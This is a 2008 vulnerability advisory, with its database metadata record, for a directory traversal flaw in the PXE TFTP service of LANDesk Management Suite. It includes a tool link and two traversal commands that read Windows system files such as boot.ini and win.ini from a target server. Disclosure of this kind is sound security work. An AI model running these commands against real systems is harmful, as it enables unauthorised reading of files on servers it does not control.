#######################################################################
Luigi Auriemma
Application: LANDesk Management Suite
http://www.landesk.com/products/ldms/index.aspx
Versions: <= 8.80.1.1
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 01 Apr 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
LANDesk is a well known system management software.
#######################################################################
======
2) Bug
======
The PXE TFTP Service is vulnerable to a classical directory traversal
vulnerability exploitable through the adding of one or more chars
before the usual dotdot pattern.
The interesting thing is that version 8.80.1.1 has been released just
to fix another directory traversal vulnerability.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none
tftpx SERVER what_you_want/../../../../../../../windows/win.ini none
#######################################################################
======
4) Fix
======
No fix
#######################################################################
---
Luigi Auriemma
http://aluigi.org
{"id": "SECURITYVULNS:DOC:19555", "bulletinFamily": "software", "title": "Directory traversal in LANDesk Management Suite 8.80.1.1", "description": "\r\n#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: LANDesk Management Suite\r\n http://www.landesk.com/products/ldms/index.aspx\r\nVersions: <= 8.80.1.1\r\nPlatforms: Windows\r\nBug: directory traversal\r\nExploitation: remote\r\nDate: 01 Apr 2008\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nLANDesk is a well known system management software.\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nThe PXE TFTP Service is vulnerable to a classical directory traversal\r\nvulnerability exploitable through the adding of one or more chars\r\nbefore the usual dotdot pattern.\r\n\r\nThe interesting thing is that version 8.80.1.1 has been released just\r\nto fix another directory traversal vulnerability.\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/tftpx.zip\r\n\r\n tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none\r\n tftpx SERVER what_you_want/../../../../../../../windows/win.ini none\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n--- \r\nLuigi Auriemma\r\nhttp://aluigi.org", "published": "2008-04-03T00:00:00", "modified": "2008-04-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19555", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 24, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8858"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8858"]}]}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645438034, "score": 1659803227}, "_internal": {"score_hash": "9b8e8e66ab8d9d92d4daaabda71c4c0a"}}